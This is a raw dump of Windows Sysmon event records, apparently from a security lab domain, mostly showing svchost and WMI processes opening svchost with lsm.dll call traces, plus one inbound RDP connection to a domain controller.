12:24:44.066{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440952Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.066{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440951Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.066{42DC5269-CE98-6086-0C00-00000000BA01}8403212C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440950Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.065{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-1500-00000000BA01}1200C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440949Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.065{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000440948Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:44.065{42DC5269-CE98-6086-0C00-00000000BA01}8406468C:\Windows\system32\svchost.exe{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+f290|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 354300x8000000000000000440947Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:40.975{42DC5269-CE99-6086-0E00-00000000BA01}1016C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse174.27.152.255-51111-false10.0.1.14win-dc-932.attackrange.local3389ms-wbt-server 23542300x8000000000000000292658Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.442{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD054D93A31F4A973E7A2345F51671F9,SHA256=2DE1F7CF23DAEDC2B3669A3620FE5204F4596A063663F2681720A594D34D34BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292657Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292656Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292655Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292654Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292653Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292652Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292651Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292650Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292649Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292648Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292647Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292646Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292645Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292644Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292643Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292642Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292641Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292640Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 